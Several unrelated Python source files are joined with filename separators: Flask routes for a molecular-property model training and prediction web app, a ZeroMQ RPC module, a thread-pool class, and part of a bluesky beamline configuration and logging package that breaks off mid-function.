def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
use_progress_bar = request.form.get('useProgressBar', 'True') == 'True'
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size),
])
# Get task names
args.task_names = get_task_names(path=data_path, smiles_columns=args.smiles_columns)
# Check if regression/classification selection matches data
data = get_data(path=data_path, smiles_columns=args.smiles_columns)
# Set the number of molecules through the length of the smiles_columns for now, we need to add an option to the site later
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
if use_progress_bar:
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, data, logger)[args.metrics[0]]
if use_progress_bar:
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
smiles = [[s] for s in smiles]
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
train_args = load_args(model_paths[0])
# Build arguments
arguments = [
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME']),
'--checkpoint_paths', *model_paths
]
if gpu is not None:
if gpu == 'None':
arguments.append('--no_cuda')
else:
arguments += ['--gpu', gpu]
# Handle additional features
if train_args.features_path is not None:
# TODO: make it possible to specify the features generator if trained using features_path
arguments += [
'--features_generator', 'rdkit_2d_normalized',
'--no_features_scaling'
]
elif train_args.features_generator is not None:
arguments += ['--features_generator', *train_args.features_generator]
if not train_args.features_scaling:
arguments.append('--no_features_scaling')
# Parse arguments
args = PredictArgs().parse_args(arguments)
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
# Replace invalid smiles with message
invalid_smiles_warning = 'Invalid SMILES String'
preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
return render_predict(predicted=True,
smiles=smiles,
num_smiles=min(10, len(smiles)),
show_more=max(0, len(smiles)-10),
task_names=task_names,
num_tasks=len(task_names),
preds=preds,
warnings=["List contains invalid SMILES strings"] if None in preds else None,
errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
:param return_page: The name of the page to render to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, MODEL_FILE_NAME)
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
:param checkpoint: The name of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one=True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
vnrpc.py
|
# encoding: UTF-8
import threading
import traceback
import signal
import zmq
from msgpack import packb, unpackb
from json import dumps, loads
# 实现Ctrl-c中断recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
########################################################################
class RpcObject(object):
"""
RPC对象
提供对数据的序列化打包和解包接口,目前提供了json和msgpack两种工具。
msgpack:性能更高,但通常需要安装msgpack相关工具;
json:性能略低但通用性更好,大部分编程语言都内置了相关的库。
因此建议尽量使用msgpack,如果要和某些语言通讯没有提供msgpack时再使用json。
如果希望使用其他的序列化工具也可以在这里添加。
"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
# 默认使用msgpack作为序列化工具
self.useMsgpack()
#----------------------------------------------------------------------
def pack(self, data):
"""打包"""
pass
#----------------------------------------------------------------------
def unpack(self, data):
"""解包"""
pass
#----------------------------------------------------------------------
def __jsonPack(self, data):
"""使用json打包"""
return dumps(data)
#----------------------------------------------------------------------
def __jsonUnpack(self, data):
"""使用json解包"""
return loads(data)
#----------------------------------------------------------------------
def __msgpackPack(self, data):
"""使用msgpack打包"""
return packb(data)
#----------------------------------------------------------------------
def __msgpackUnpack(self, data):
"""使用msgpack解包"""
return unpackb(data)
#----------------------------------------------------------------------
def useJson(self):
"""使用json作为序列化工具"""
self.pack = self.__jsonPack
self.unpack = self.__jsonUnpack
#----------------------------------------------------------------------
def useMsgpack(self):
"""使用msgpack作为序列化工具"""
self.pack = self.__msgpackPack
self.unpack = self.__msgpackUnpack
########################################################################
class RpcServer(RpcObject):
"""RPC服务器"""
#----------------------------------------------------------------------
def __init__(self, repAddress, pubAddress):
"""Constructor"""
super(RpcServer, self).__init__()
# 保存功能函数的字典,key是函数名,value是函数对象
self.__functions = {}
# zmq端口相关
self.__context = zmq.Context()
self.__socketREP = self.__context.socket(zmq.REP) # 请求回应socket
self.__socketREP.bind(repAddress)
self.__socketPUB = self.__context.socket(zmq.PUB) # 数据广播socket
self.__socketPUB.bind(pubAddress)
# 工作线程相关
self.__active = False # 服务器的工作状态
self.__thread = threading.Thread(target=self.__run) # 服务器的工作线程
#----------------------------------------------------------------------
def start(self):
"""启动服务器"""
# 将服务器设为启动
self.__active = True
# 启动工作线程
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止服务器"""
# 将服务器设为停止
self.__active = False
# 等待工作线程退出
self.__thread.join()
#----------------------------------------------------------------------
def __run(self):
"""连续运行函数"""
while self.__active:
# 从请求响应socket收取请求数据
reqb = self.__socketREP.recv()
# 序列化解包
req = self.unpack(reqb)
# 获取函数名和参数
name, args, kwargs = req
# 获取引擎中对应的函数对象,并执行调用,如果有异常则捕捉后返回
try:
func = self.__functions[name]
r = func(*args, **kwargs)
rep = [True, r]
except Exception as e:
rep = [False, traceback.format_exc()]
# 序列化打包
repb = self.pack(rep)
# 通过请求响应socket返回调用结果
self.__socketREP.send(repb)
#----------------------------------------------------------------------
def publish(self, topic, data):
"""
广播推送数据
topic:主题内容
data:具体的数据
"""
# 序列化数据
datab = self.pack(data)
# 通过广播socket发送数据
self.__socketPUB.send_multipart([topic, datab])
#----------------------------------------------------------------------
def register(self, func):
"""注册函数"""
self.__functions[func.__name__] = func
########################################################################
class RpcClient(RpcObject):
"""RPC客户端"""
#----------------------------------------------------------------------
def __init__(self, reqAddress, subAddress):
"""Constructor"""
super(RpcClient, self).__init__()
# zmq端口相关
self.__reqAddress = reqAddress
self.__subAddress = subAddress
self.__context = zmq.Context()
self.__socketREQ = self.__context.socket(zmq.REQ) # 请求发出socket
self.__socketSUB = self.__context.socket(zmq.SUB) # 广播订阅socket
# 工作线程相关,用于处理服务器推送的数据
self.__active = False # 客户端的工作状态
self.__thread = threading.Thread(target=self.__run) # 客户端的工作线程
#----------------------------------------------------------------------
def __getattr__(self, name):
"""实现远程调用功能"""
# 执行远程调用任务
def dorpc(*args, **kwargs):
# 生成请求
req = [name, args, kwargs]
# 序列化打包请求
reqb = self.pack(req)
# 发送请求并等待回应
self.__socketREQ.send(reqb)
repb = self.__socketREQ.recv()
# 序列化解包回应
rep = self.unpack(repb)
# 若正常则返回结果,调用失败则触发异常
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
#----------------------------------------------------------------------
def start(self):
"""启动客户端"""
# 连接端口
self.__socketREQ.connect(self.__reqAddress)
self.__socketSUB.connect(self.__subAddress)
# 将服务器设为启动
self.__active = True
# 启动工作线程
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止客户端"""
# 将客户端设为停止
self.__active = False
# 等待工作线程退出
self.__thread.join()
#----------------------------------------------------------------------
def __run(self):
"""连续运行函数"""
while self.__active:
# 从订阅socket收取广播数据
topic, datab = self.__socketSUB.recv_multipart()
# 序列化解包
data = self.unpack(datab)
# 调用回调函数处理
self.callback(topic, data)
#----------------------------------------------------------------------
def callback(self, topic, data):
"""回调函数,必须由用户实现"""
raise NotImplementedError
#----------------------------------------------------------------------
def subscribe(self, topic):
"""
订阅特定主题的广播数据
可以使用topic=''来订阅所有的主题
"""
self.__socketSUB.setsockopt(zmq.SUBSCRIBE, topic)
########################################################################
class RemoteException(Exception):
"""RPC远程异常"""
#----------------------------------------------------------------------
def __init__(self, value):
"""Constructor"""
self.__value = value
#----------------------------------------------------------------------
def __str__(self):
"""输出错误信息"""
return self.__value
|
ThreadPool.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
import traceback
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
self.q = queue.Queue() # 存放任务的队列
self.max_num = max_num # 最大线程并发数
self.terminal = False # 如果为True 终止所有线程,不再获取新任务
self.generate_list = [] # 已经创建的线程
self.free_list = [] # 闲置的线程
# self.run_sum_time=0
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: # 无空闲线程和不超过最大线程数
self.generate_thread() # 创建线程
w = (func, args, callback,) # 保存参数为元组
self.q.put(w) # 添加到任务队列
# self.run_sum_time+=1
def generate_thread(self):
"""
创建一个线程
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
循环去获取任务函数并执行任务函数
"""
current_thread = threading.currentThread # 获取当前线程对象
self.generate_list.append(current_thread) # 添加到已创建线程里
event = self.q.get() # 获取任务
while event != StopEvent: # 如果不为停止信号
func, arguments, callback = event # 分别取值,
try:
result = func(*arguments) # 运行函数,把结果赋值给result
status = True # 运行结果是否正常
except Exception as e:
status = False # 不正常
result = traceback.format_exc() # 结果为错误信息
if callback is not None: # 是否有回调函数
try:
callback(status, result) # 执行回调函数
except Exception as e:
# print("回调函数出错:"+str(traceback.format_exc()))
pass
if self.terminal: # 默认为False ,如果调用terminal方法
event = StopEvent # 停止信号
else:
# self.free_list.append(current_thread) #执行完毕任务,添加到闲置列表
# event = self.q.get() #获取任务
# self.free_list.remove(current_thread) #获取到任务之后,从闲置里删除
with self.worker_state(self.free_list, current_thread):
event = self.q.get()
else:
self.generate_list.remove(current_thread) # 如果收到终止信号,就从已创建的列表删除
def close(self): # 终止线程
num = len(self.generate_list) # 获取总已创建的线程
while num:
self.q.put(StopEvent) # 添加停止信号,有几个线程就添加几个
num -= 1
# 终止线程(清空队列)
def terminate(self):
self.terminal = True # 更改为True,
while self.generate_list: # 如果有已创建线程存活
self.q.put(StopEvent) # 有几个就发几个信号
self.q.empty() # 清空队列
@contextlib.contextmanager
def worker_state(self, free_list, current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
|
__init__.py
|
from distutils.version import LooseVersion
import logging
from logging.handlers import SysLogHandler, TimedRotatingFileHandler
import os
from pathlib import Path
import sys
import queue
import threading
import uuid
import warnings
import appdirs
from IPython import get_ipython
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
bluesky_log_file_path = None
def import_star(module, ns):
def public(name):
return not name.startswith("_")
ns.update({name: getattr(module, name) for name in dir(module) if public(name)})
def configure_base(
user_ns,
broker_name,
*,
bec=True,
bec_derivative=False,
epics_context=False,
magics=True,
mpl=True,
configure_logging=True,
pbar=True,
ipython_logging=True,
publish_documents_to_kafka=False,
tb_minimize=True,
):
"""
Perform base setup and instantiation of important objects.
This factory function instantiates essential objects to data collection
environments at NSLS-II and adds them to the current namespace. In some
cases (documented below), it will check whether certain variables already
exist in the user name space, and will avoid creating them if so. The
following are added:
* ``RE`` -- a RunEngine
This is created only if an ``RE`` instance does not currently exist in
the namespace.
* ``db`` -- a Broker (from "databroker"), subscribe to ``RE``
* ``bec`` -- a BestEffortCallback, subscribed to ``RE``
* ``peaks`` -- an alias for ``bec.peaks``
* ``sd`` -- a SupplementalData preprocessor, added to ``RE.preprocessors``
* ``pbar_maanger`` -- a ProgressBarManager, set as the ``RE.waiting_hook``
And it performs some low-level configuration:
* creates a context in ophyd's control layer (``ophyd.setup_ophyd()``)
* turns on interactive plotting (``matplotlib.pyplot.ion()``)
* bridges the RunEngine and Qt event loops
(``bluesky.utils.install_kicker()``)
* logs ERROR-level log message from ophyd to the standard out
Parameters
----------
user_ns: dict
a namespace --- for example, ``get_ipython().user_ns``
broker_name : Union[str, Broker]
Name of databroker configuration or a Broker instance.
bec : boolean, optional
True by default. Set False to skip BestEffortCallback.
bec_derivative : boolean, optional
False by default. Set True to enable derivative and its stats
calculation in BestEffortCallback.
epics_context : boolean, optional
True by default. Set False to skip ``setup_ophyd()``.
magics : boolean, optional
True by default. Set False to skip registration of custom IPython
magics.
mpl : boolean, optional
True by default. Set False to skip matplotlib ``ion()`` at event-loop
bridging.
configure_logging : boolean, optional
True by default. Set False to skip INFO-level logging.
pbar : boolean, optional
True by default. Set false to skip ProgressBarManager.
ipython_logging : boolean, optional
True by default. Console output and exception stack traces will be
written to IPython log file when IPython logging is enabled.
publish_documents_to_kafka: boolean, optional
False by default. If True publish bluesky documents to a Kafka message broker
tb_minimize : boolean, optional
If IPython should print out 'minimal' tracebacks.
Returns
-------
names : list
list of names added to the namespace
Examples
--------
Configure IPython for CHX.
>>>> configure_base(get_ipython().user_ns, 'chx');
"""
ipython = get_ipython()
ns = {} # We will update user_ns with this at the end.
# Protect against double-subscription.
SENTINEL = "__nslsii_configure_base_has_been_run"
if user_ns.get(SENTINEL):
raise RuntimeError("configure_base should only be called once per process.")
ns[SENTINEL] = True
# Set up a RunEngine and use metadata backed by files on disk.
from bluesky import RunEngine, __version__ as bluesky_version
if LooseVersion(bluesky_version) >= LooseVersion("1.6.0"):
# current approach using PersistentDict
from bluesky.utils import PersistentDict
directory = os.path.expanduser("~/.config/bluesky/md")
os.makedirs(directory, exist_ok=True)
md = PersistentDict(directory)
else:
# legacy approach using HistoryDict
from bluesky.utils import get_history
md = get_history()
# if RunEngine already defined grab it
# useful when users make their own custom RunEngine
if "RE" in user_ns:
RE = user_ns["RE"]
else:
RE = RunEngine(md)
ns["RE"] = RE
# Set up SupplementalData.
# (This is a no-op until devices are added to it,
# so there is no need to provide a 'skip_sd' switch.)
from bluesky import SupplementalData
sd = SupplementalData()
RE.preprocessors.append(sd)
ns["sd"] = sd
if isinstance(broker_name, str):
# Set up a Broker.
from databroker import Broker
db = Broker.named(broker_name)
ns["db"] = db
else:
db = broker_name
RE.subscribe(db.insert)
if pbar:
# Add a progress bar.
from bluesky.utils import ProgressBarManager
pbar_manager = ProgressBarManager()
RE.waiting_hook = pbar_manager
ns["pbar_manager"] = pbar_manager
if magics:
# Register bluesky IPython magics.
from bluesky.magics import BlueskyMagics
if ipython:
ipython.register_magics(BlueskyMagics)
if bec:
# Set up the BestEffortCallback.
from bluesky.callbacks.best_effort import BestEffortCallback
_bec_kwargs = {}
if bec_derivative:
_bec_kwargs["calc_derivative_and_stats"] = True
_bec = BestEffortCallback(**_bec_kwargs)
RE.subscribe(_bec)
ns["bec"] = _bec
ns["peaks"] = _bec.peaks # just as alias for less typing
if mpl:
# Import matplotlib and put it in interactive mode.
import matplotlib.pyplot as plt
ns["plt"] = plt
plt.ion()
# Make plots update live while scans run.
if LooseVersion(bluesky_version) < LooseVersion("1.6.0"):
from bluesky.utils import install_kicker
install_kicker()
if epics_context:
# Create a context in the underlying EPICS client.
from ophyd import setup_ophyd
setup_ophyd()
if configure_logging:
configure_bluesky_logging(ipython=ipython)
if ipython_logging and ipython:
from nslsii.common.ipynb.logutils import log_exception
# IPython logging will be enabled with logstart(...)
configure_ipython_logging(exception_logger=log_exception, ipython=ipython)
if publish_documents_to_kafka:
_build_and_subscribe_kafka_publisher(
RE,
beamline_name=broker_name,
bootstrap_servers=os.environ['BLUESKY_KAFKA_BOOTSTRAP_SERVERS'],
producer_config={
"acks": 0,
"message.timeout.ms": 3000,
"queue.buffering.max.kbytes": 10 * 1048576, # default is 1048576
"compression.codec": "snappy"
},
)
if tb_minimize and ipython:
# configure %xmode minimal
# so short tracebacks are printed to the console
ipython.magic("xmode minimal")
# convenience imports
# some of the * imports are for 'back-compatibility' of a sort -- we have
# taught BL staff to expect LiveTable and LivePlot etc. to be in their
# namespace
import numpy as np
ns["np"] = np
import bluesky.callbacks
ns["bc"] = bluesky.callbacks
import_star(bluesky.callbacks, ns)
import bluesky.plans
ns["bp"] = bluesky.plans
import_star(bluesky.plans, ns)
import bluesky.plan_stubs
ns["bps"] = bluesky.plan_stubs
import_star(bluesky.plan_stubs, ns)
# special-case the commonly-used mv / mvr and its aliases mov / movr4
ns["mv"] = bluesky.plan_stubs.mv
ns["mvr"] = bluesky.plan_stubs.mvr
ns["mov"] = bluesky.plan_stubs.mov
ns["movr"] = bluesky.plan_stubs.movr
import bluesky.preprocessors
ns["bpp"] = bluesky.preprocessors
import bluesky.callbacks.broker
import_star(bluesky.callbacks.broker, ns)
import bluesky.simulators
import_star(bluesky.simulators, ns)
user_ns.update(ns)
return list(ns)
def configure_bluesky_logging(ipython, appdirs_appname="bluesky", propagate_log_messages=False):
"""
Configure a TimedRotatingFileHandler log handler and attach it to
bluesky, ophyd, caproto, and nslsii loggers. In addition, by default set
the ``propagate`` field on each logger to ``False`` so log messages will
not propagate to higher level loggers such as a root logger configured
by a user. If you want log messages from these loggers to propagate to
higher level loggers simply set ``propagate_log_messages=True`` when
calling this function, or set the ``propagate`` field to ``True`` in
client code.
The log file path is taken from environment variable BLUESKY_LOG_FILE, if
that variable has been set. If not the default log file location is determined
by the appdirs package. The default log directory will be created if it does
not exist.
Parameters
----------
ipython: InteractiveShell
IPython InteractiveShell used to attach bluesky log handler to ipython
appdirs_appname: str
appname passed to appdirs.user_log_dir() when the BLUESKY_LOG_FILE
environment variable has not been set; use the default for production,
set to something else for testing
propagate_log_messages: bool
the ``propagate`` field on the bluesky, caproto, nslsii, ophyd, and ipython
loggers will be set to this value; if False (the default) log messages
from these loggers will not propagate to higher-level loggers
(such as a root logger)
Returns
-------
bluesky_log_file_path: Path
log file path
"""
global bluesky_log_file_path
if "BLUESKY_LOG_FILE" in os.environ:
bluesky_log_file_path = Path(os.environ["BLUESKY_LOG_FILE"])
print(
f"bluesky log file path configured from environment variable"
f" BLUESKY_LOG_FILE: '{bluesky_log_file_path}'",
file=sys.stderr,
)
else:
bluesky_log_dir = Path(appdirs.user_log_dir(appname=appdirs_appname))
if not bluesky_log_dir.exists():
bluesky_log_dir.mkdir(parents=True, exist_ok=True)
bluesky_log_file_path = bluesky_log_dir / Path("bluesky.log")
print(
f"environment variable BLUESKY_LOG_FILE is not set,"
f" using default log file path '{bluesky_log_file_path}'",
file=sys.stderr,
)
logging_handlers = []
log_file_handler = TimedRotatingFileHandler(
filename=str(bluesky_log_file_path), when="W0", backupCount=10
)
log_file_handler.setLevel("INFO")
log_file_format = (
"[%(levelname)1.1s %(asctime)s.%(msecs)03d %(name)s"
" %(module)s:%(lineno)d] %(message)s"
)
log_file_handler.setFormatter(logging.Formatter(fmt=log_file_format))
logging_handlers.append(log_file_handler)
def build_syslog_handler(address):
syslog_handler = SysLogHandler(address=address)
syslog_handler.setLevel(logging.INFO)
# no need to log date and time, systemd does that
formatter = logging.Formatter(
"%(name)s[%(process)s]: %(levelname)s - %(module)s:%(lineno)d] %(message)s"
)
# add formatter to syslog_handler
syslog_handler.setFormatter(formatter)
return syslog_handler
if Path("/dev/log").exists():
logging_handlers.append(build_syslog_handler(address="/dev/log"))
elif Path("/var/run/syslog").exists():
logging_handlers.append(build_syslog_handler(address="/var/run/syslog"))
else:
# syslog is not available available
pass
for logger_name in ("bluesky", "caproto", "ophyd", "nslsii"):
logger = logging.getLogger(logger_name)
for logging_handler in logging_handlers:
logger.addHandler(logging_handler)
logger.setLevel("INFO")
logger.propagate = propagate_log_messages
if ipython:
for logging_handler in logging_handlers:
ipython.log.addHandler(logging_handler)
ipython.log.setLevel("INFO")
ipython.log.propagate = propagate_log_messages
return bluesky_log_file_path
def configure_ipython_logging(
exception_logger, ipython, rotate_file_size=100000, appdirs_appname="bluesky"
):
"""
Configure IPython output logging with logstart and IPython exception logging with set_custom_exc(...).
Set a custom exception logging function and execute logstart.
The log file path is taken from environment variable BLUESKY_IPYTHON_LOG_FILE, if
it that variable has been set. If not the default log file location is determined
by the appdirs package.
Parameters
----------
exception_logger: function f(ipyshell, etype, evalue, tb, tb_offset=None) -> list
a function that will handle logging exceptions
ipython: InteractiveShell
IPython InteractiveShell into which the specified exception_logger will be installed
rotate_file_size: int, optional
at the time configure_ipython_exc_logging() is called, if there exists a log file
with size in bytes greater than or equal to rotate_file_size, the existing file will
be renamed and a new log file will be created
appdirs_appname: str
appname passed to appdirs.user_log_dir(); use the default for production,
set to something else for testing
Returns
-------
bluesky_ipython_log_file_path: Path
log file path
"""
# install the specified function to log exceptions
ipython.set_custom_exc((BaseException,), exception_logger)
if "BLUESKY_IPYTHON_LOG_FILE" in os.environ:
bluesky_ipython_log_file_path = Path(os.environ["BLUESKY_IPYTHON_LOG_FILE"])
print(
"bluesky ipython log file configured from environment"
f" variable BLUESKY_IPYTHON_LOG_FILE: '{bluesky_ipython_log_file_path}'",
file=sys.stderr,
)
else:
bluesky_ipython_log_dir = Path(appdirs.user_log_dir(appname=appdirs_appname))
if not bluesky_ipython_log_dir.exists():
bluesky_ipython_log_dir.mkdir(parents=True, exist_ok=True)
bluesky_ipython_log_file_path = bluesky_ipython_log_dir / Path(
"bluesky_ipython.log"
)
print(
"environment variable BLUESKY_IPYTHON_LOG_FILE is not set,"
